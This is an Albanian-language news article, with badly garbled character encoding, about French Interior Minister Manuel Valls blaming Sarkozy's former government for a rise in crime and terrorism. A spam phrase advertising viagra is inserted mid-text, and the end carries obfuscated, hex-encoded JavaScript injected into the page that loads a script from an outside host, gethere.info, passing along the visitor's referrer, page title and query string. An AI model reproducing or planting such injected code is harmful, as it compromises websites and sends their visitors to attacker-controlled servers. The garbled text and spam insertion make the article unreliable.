f.1113220753643_m

Krimi pA�rA�an Parlamentin francez

Ministri i BrendshA�m i FrancA�s akuzoi paraardhA�sit e tij nA� qeveritA� demokrate pA�r neglizhim tA� rrezikut tA� terrorizmit dhe paaftA�si nA� luftA�n kundA�r krimit, qA� sipas tij ka pA�suar njA� rritje a�?katastrofikea�?. ake order viagra online.

Ministri i qeverisA� socialiste tA� presidentit Hollande, Manuel Valls, fajA�soi ish-Presidentin Nicolas Sarkozy dhe ministrat e tij pA�r rritjen a�?e pabesueshmea�?, sipas tij, tA� pasigurisA� sA� jetA�s nA� vend.

a�?A�shtA� qeverisja juaj, e vetmja qA� duhet fajA�suar pA�r rikthimin e terrorizmit nA� kA�tA� venda�?, deklaroi Valls, gjatA� njA� seance parlamentare.

Kjo deklaratA� e ashpA�r e Valls shkaktoi njA� debat tA� irrituar nA� sallA�, ndA�rsa deputetA� tA� opozitA�s kA�rkuan njA�zA�ri nA� korr dorA�heqjen e tij.

ShpA�rthimi i ministrit tA� BrendshA�m erdhi pasi njA� deputet i partisA� sA� Sarkozy, kA�rkoi shpjegime pA�r tA� dhA�nat e kriminalitetit, qA� sipas njA� artikulli tA� publikuar nA� tetor tA� pA�rditshmen a�?Le Figaroa�?, gjatA� muajve tA� fundit ka pA�suar njA� rritje tA� paprecedent, transmeton TCH.

Statistikat e publikuara nA� gazetA� treguan pA�r njA� rritje me 9% tA� krimeve tA� dhunshme, 8% tA� vjedhjeve dhe 18% tA� krimeve ekonomike.

Sipas demokratA�ve tA� qendrA�s sA� djathtA� nA� opozitA�, shifra tA� tilla kaq alarmante tA� kriminalitetit nuk ishin parA� qA� prej qeverisjes sA� socialistit Lionel Jospin, nA� vitet 1997-2002.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}